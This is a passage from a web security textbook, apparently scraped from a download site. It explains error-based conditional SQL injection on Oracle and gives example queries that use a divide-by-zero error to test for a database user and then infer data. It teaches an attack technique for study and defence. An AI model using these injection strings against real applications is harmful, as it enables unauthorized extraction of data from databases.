The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

An example of this is the following query, which tests whether the default

Oracle user 

DBSNMP

exists. If this user exists, then the expression 

1/0

is evalu-

ated, causing an error:

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘DBSNMP’) = ‘DBSNMP’

The following query tests whether an invented user 

AAAAAA

exists. Because

the 

WHERE

condition is never true, the expression 

1/0

is not evaluated, and so

no error occurs. 

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘AAAAAA’) = ‘AAAAAA’

What this technique achieves is a way of inducing a conditional response

within the application, even in cases where the query you are injecting has no

impact on the application’s logic or data processing. It, therefore, enables you

to use the inference techniques described previously to extract data in a very

wide range of situations. Further, because of the technique’s simplicity, the

same attack strings will work on a range of databases, and where the injection

point is into various types of SQL statement.

Download 5,76 Mb.

Do'stlaringiz bilan baham: